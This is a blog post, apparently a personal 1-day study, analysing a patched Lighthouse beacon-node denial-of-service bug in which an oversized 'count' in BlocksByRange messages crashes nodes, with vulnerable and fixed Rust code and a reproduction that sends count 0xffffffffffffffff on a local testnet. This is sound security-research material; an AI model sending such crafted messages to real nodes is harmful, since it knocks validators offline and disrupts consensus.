전체 글

CL-2023-01 2024.05.13 1

CL-2023-01

kind_killerwhale 2024. 5. 13. 02:03

2024. 5. 13. 02:03

Bug Short Description

The lighthouse beacon nodes can be crashed via malicious BlocksByRange messages containing an overly large 'count' value.

Type : DoS

Report Link : https://notes.ethereum.org/mw-M7HxuRM-09nSPVqp52A

The lighthouse beacon nodes can be crashed via malicious BlocksByRange messages containing an overly large 'count' value - HackMD

Affected Clients : Lighthouse

Severity : High

Bounty Reward (USD) : 50000 $

Attack Scenario

Category : Insufficient Validation

Attackers are able to crash lighthouse nodes by sending malicious BlocksByRange messages. For reference, the relevant message structs are as follows:

(beacon_node/lighthouse_network/src/rpc/methods.rs)

공격자는 악의적인 BlocksByRange 메시지를 보내 Lighthouse 노드를 충돌시킬 수 있다. 참고로 관련 메시지 구조체는 다음과 같다. : (beacon_node/lighthouse_network/src/rpc/methods.rs)

/// Request a number of beacon block roots from a peer.
#[derive(Encode, Decode, Clone, Debug, PartialEq)]
pub struct BlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,
}

/// Request a number of beacon block roots from a peer.
#[derive(Encode, Decode, Clone, Debug, PartialEq)]
pub struct OldBlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,

    /// The step increment to receive blocks.
    ///
    /// A value of 1 returns every block.
    /// A value of 2 returns every second block.
    /// A value of 3 returns every third block and so on.
    pub step: u64,
}

Cause Case : Insufficient Validation - 불충분한 검증

count 변수가 검증된 값인지 확인하지 않고 메모리 할당 호출에 대한 BlockByRange 수신 메세지에 있는 count 값을 사용하여 발생한다. 이 u64로 선언된 count 값은 검증되지 않은 상태로 VecDeque 객체에 할당할 VecDeque::with_capacity()로 전달된다. 이 u64 형식의 값은 검증을 하지 않기 때문에 BlocksByRange 메세지를 조작하여 VecDeque::with_capacity()에 매우 큰 값이 전달 될 수 있다. 이는 할당 실패 패닉을 발생시킬 수 있다.

beacon_node/lighthouse_network/src/rpc/handler.rs의 inject_pully_negotiated_inbound() 함수가 영향을 받았다.

 fn inject_fully_negotiated_inbound(
        &mut self,
        substream: <Self::InboundProtocol as InboundUpgrade<NegotiatedSubstream>>::Output,
        _info: Self::InboundOpenInfo,
    ) {
        // only accept new peer requests when active
        if !matches!(self.state, HandlerState::Active) {
            return;
        }

        let (req, substream) = substream;
        let expected_responses = req.expected_responses();   // [1]

        // store requests that expect responses
        if expected_responses > 0 {
            if self.inbound_substreams.len() < MAX_INBOUND_SUBSTREAMS {
                // Store the stream and tag the output.
                let delay_key = self.inbound_substreams_delay.insert(
                    self.current_inbound_substream_id,
                    Duration::from_secs(RESPONSE_TIMEOUT),
                );
                let awaiting_stream = InboundState::Idle(substream);
                self.inbound_substreams.insert(
                    self.current_inbound_substream_id,
                    InboundInfo {
                        state: awaiting_stream,
                        pending_items: VecDeque::with_capacity(expected_responses as usize),    // [3] pass unvalidated u64 size value as capacity to allocate for VecDeque object
                        delay_key: Some(delay_key),
                        protocol: req.protocol(),
                        request_start_time: Instant::now(),
                        remaining_chunks: expected_responses,
                    },
                );
            } else {
                self.events_out.push(Err(HandlerErr::Inbound {
                    id: self.current_inbound_substream_id,
                    proto: req.protocol(),
                    error: RPCError::HandlerRejected,
                }));
                return self.shutdown(None);
            }
        }

....

    /// Number of responses expected for this request.
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => req.count,    // [2] for a BlocksByRange message, return the unvalidated u64 'count' member found in the BlocksByRange message itself
            InboundRequest::BlocksByRoot(req) => req.block_roots.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
        }
    }

inject_fully_negotiated_inbound 함수에서 expected_responses를 선언하는데 이때 expected_response 함수를 쓴다. 이때 우리는 BlocksByRange 함수를 호출해야한다. 이 함수를 통하여 count를 조작하고 이 값은 pending_items: VecDeque::with_capacity(expected_responses as usize)에 들어가게 된다. 할당 값이 너무 큰 경우 패닉이 발생되게 된다.

2 cases

노드에서 패닉이 발생하게 될 경우, common/task_executor/src/lib.rs에 있는 generate_monitor()의 패닉 처리가 실행되고 노드가 충돌하게 된다.
성공적인 할당을 받을 만큼의 값을 넣지만, OS의 OOM killer가 SIGKILL을 사용하여 프로세스를 중단시킬 만큼의 적당한 큰 값을 BlocksByRange 함수에 넣는다.

Impacts

임의의 lighthouse 노드를 충돌시켜 네트워크에서 심각한 라이브러리/PoS 합의 문제를 발생시킬 수 있다.

Patch

github blame을 통하여 issue나 commit을 찾아보았으나, patch 내역을 못 찾아서 최신 코드를 보고 대조하며 patch가 어떻게 되었는지 살펴봤다.

 	fn on_fully_negotiated_inbound(&mut self, substream: InboundOutput<Stream, TSpec>) {
        // only accept new peer requests when active
        if !matches!(self.state, HandlerState::Active) {
            return;
        }

        let (req, substream) = substream;
        let expected_responses = req.expected_responses(); // [1]

        // store requests that expect responses
        if expected_responses > 0 {
            if self.inbound_substreams.len() < MAX_INBOUND_SUBSTREAMS {
                // Store the stream and tag the output.
                let delay_key = self
                    .inbound_substreams_delay
                    .insert(self.current_inbound_substream_id, self.resp_timeout);
                let awaiting_stream = InboundState::Idle(substream);
                self.inbound_substreams.insert(
                    self.current_inbound_substream_id,
                    InboundInfo {
                        state: awaiting_stream,
                        pending_items: VecDeque::with_capacity(std::cmp::min(
                            expected_responses,
                            128,
                        ) as usize), // [3]
                        delay_key: Some(delay_key),
                        protocol: req.versioned_protocol().protocol(),
                        request_start_time: Instant::now(),
                        remaining_chunks: expected_responses,
                    },
                );
            } else {
                self.events_out.push(HandlerEvent::Err(HandlerErr::Inbound {
                    id: self.current_inbound_substream_id,
                    proto: req.versioned_protocol().protocol(),
                    error: RPCError::HandlerRejected,
                }));
                return self.shutdown(None);
            }
        }
        
        
 ....
 
 
		 /// Number of responses expected for this request.
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => *req.count(),
            InboundRequest::BlocksByRoot(req) => req.block_roots().len() as u64,
            InboundRequest::BlobsByRange(req) => req.max_blobs_requested::<TSpec>(),
            InboundRequest::BlobsByRoot(req) => req.blob_ids.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
            InboundRequest::LightClientBootstrap(_) => 1,
        }
    }

expected_response() 함수

let expected_responses = req.expected_responses(); // [1]

전체적으로 inject_fully_negotiated_inbount 함수에서 on_fully_negotiated_inbound 함수로 바뀌었다. 그리고 함수 내부 변수 expected_responses를 선언하는 선언부는 동일하다.

그럼 한 번 expected_responses 함수가 어떻게 바뀌었는지 살펴보자.

/// Number of responses expected for this request.
/// Before
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => req.count,    // [2] for a BlocksByRange message, return the unvalidated u64 'count' member found in the BlocksByRange message itself
            InboundRequest::BlocksByRoot(req) => req.block_roots.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
        }
    }

/// Number of responses expected for this request.
/// After
/// lighthouse/beacon_node/lighthouse_network/src /rpc/protocol.rs
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => *req.count(),
            InboundRequest::BlocksByRoot(req) => req.block_roots().len() as u64,
            InboundRequest::BlobsByRange(req) => req.max_blobs_requested::<TSpec>(),
            InboundRequest::BlobsByRoot(req) => req.blob_ids.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
            InboundRequest::LightClientBootstrap(_) => 1,
        }
    }

기존 코드에서 BlobsBy??? 형식으로 2개가 추가되면서 LightClientBootstrap도 추가되었다.

그리고 우리가 집중해야 할 부분은 BlocksByRange()이다. 한 번 살펴보자.

#[derive(Debug, Clone, PartialEq)]
pub enum InboundRequest<TSpec: EthSpec> {
    Status(StatusMessage),
    Goodbye(GoodbyeReason),
    BlocksByRange(OldBlocksByRangeRequest),
    BlocksByRoot(BlocksByRootRequest),
    BlobsByRange(BlobsByRangeRequest),
    BlobsByRoot(BlobsByRootRequest),
    LightClientBootstrap(LightClientBootstrapRequest),
    Ping(Ping),
    MetaData(MetadataRequest<TSpec>),
}

pub struct OldBlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,

    /// The step increment to receive blocks.
    ///
    /// A value of 1 returns every block.
    /// A value of 2 returns every second block.
    /// A value of 3 returns every third block and so on.
    pub step: u64,
}

pub struct BlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,
}

InboundRequest::BlocksByRange(req) => req.count에서 InboundRequest::BlocksByRange(req) => *req.count()로 바뀌었다. 이는 후처리를 위한 것으로 보인다.

/// Before
pending_items: VecDeque::with_capacity(expected_responses as usize),    // [3] pass unvalidated u64 size value as capacity to allocate for VecDeque object

/// After
pending_items: VecDeque::with_capacity(std::cmp::min(
                            expected_responses,
                            128,
                        ) as usize)

기존에는 expected_responses를 usize로 검증없이 바로 변환하였다면, 패치된 코드는 std::cmp::min(expected_responses, 128, ) 후 에 usize로 변환한다.

이는 expected_responses와 128 중 작은 값을 usize 타입으로 변환하여, 해당 용량(capacity)으로 초기화된 VecDeque를 생성한다. 즉, 패닉을 일으킬 만한 값이나 OOM killer에 의해 SIGKILL 당할 만한 값보다 작게 방지하는 것이다.

Reproduction

Reproduction을 하기 위하여 필요한 패키지들(rust, yarn, nodejs, siren 등)과 모두 호환되면서, lighthouse 구 버전에 모두 적합하는 버전은 없었다. ⇒ 3.5.1이상이여야 하는데 패치 전 최신 버전이 3.5.0임.
일단 3.5.1을 받고, 그 버전에 맞는 호환 패키지들을 각각 다 설치하여 빌드를 함.
3.5.1에 기존 코드를 수정 ⇒ 폴더나, 함수 등 바뀐것이 거의 없다고 판단 ⇒ 가능
lighthouse/beacon_node/lighthouse_network/src /rpc/protocol.rs와 handler.rs 예전 코드 형식으로 diff해서 수정 ⇒ protocol.rs 동일, handler.rs → std::cmp~~ 삭제
BlocksByRange에 악의적으로 큰 값을 대입하는 것이 목표 → beacon_node/network/src/router/processor.r의 send_status() 함수 수정해야함

/// Sends a `Status` message to the peer.
///
/// Called when we first connect to a peer, or when the PeerManager determines we need to
/// re-status.
pub fn send_status(&mut self, peer_id: PeerId) {
    let status_message = status_message(&self.chain);
    debug!(self.log, "Sending Status Request"; "peer" => %peer_id, &status_message);
    self.network
        .send_processor_request(peer_id, Request::Status(status_message));
     // send malicious BlocksByRange message here
     let blocks_by_range_message = BlocksByRangeRequest {
     start_slot: 5,
         count: 0xffffffffffffffff,
     };
     debug!(self.log, "---- Sending BlocksByRangeRequest Request");
     self.network
         .send_processor_request(peer_id, Request::BlocksByRange(blocks_by_range_message));
}

가장 큰 값인 UINT64_MAX인 0xffffffffffffffff를 count 변수에 넣는 작업이다.

make 명령어로 root로 build
/siren/local-testnet/에서 vi vars.env로 BN_COUNT 4에서 8로 수정 ⇒ log도 8개 생성
./start_local_testnet.sh → But 현재 lcli와 siren 내부 명령어 루틴이 다른 것 같음. ex option not found or could not force overwrite ( 예전엔 —force option이 없었는듯..)
그래서 예전 lcli release를 보고 재빌드하여 내부 setup.sh 옵션들을 맞춰보기도 하고, 예전 option을 맞춰 bash shellscript를 수정하기도 하고 했지만 결국 모두 실패
그래서 그냥 lighthouse 내부 local-testnet에서 돌려서 실시간으로 로그를 확인해보려 함
- tail은 리눅스에서 오류나 파일 로그를 실시간으로 확인할 때 사용한다.
- tail -f [FILE_NAME] → 실시간으로 종료시키지 않고 로그를 불러온다.
- ex ) tail -f app_1.log | grep “panic”
성공 → beacon_node_1.log에서 RUST_BACKTRACE=full로 panic이 일어남.

후기 및 참고 링크

Node의 1-Day를 분석한 것은 처음이라 지식을 쌓는 과정에서 시간이 좀 걸렸다.
그래도 적응가고 함수와 변수들이 전체적으로 어떻게 작동하고, 흐름을 파악하려는 노력을 하니 잘 된 것 같다.
이번 케이스는 github에 개발자들의 패치 내역이 없어 생각을 직접적으로 알기는 어려웠으나, 그렇게 복잡한 버그는 아니라서 스스로 대조해보며 분석이 가능했다.
Reproduction에서 가장 시간이 많이 걸렸다. 처음 해 보는데 중간에 어려움도 많이 있었지만 나쁘지 않은 경험이었다.
Link Reference
- https://github.com/sigp/lighthouse/tree/unstable/scripts/local_testnet
- https://github.com/sigp/siren

'Blockchain' 카테고리의 다른 글

Damn Vulnerable DeFi Challenge #6 - Selfie (0)	2024.07.05
Damn Vulnerable DeFi Challenge #5 - The Rewarder (1)	2024.07.05
LayerZero 1-Day Analysis (0)	2024.06.16
LZ Case Analyze (0)	2024.05.27
Damn Vulnerable DeFi Challenge #4 - Side Entrance (0)	2024.05.19

PREV 이전 1 2 3 4 5 NEXT 다음

kind_killerwhale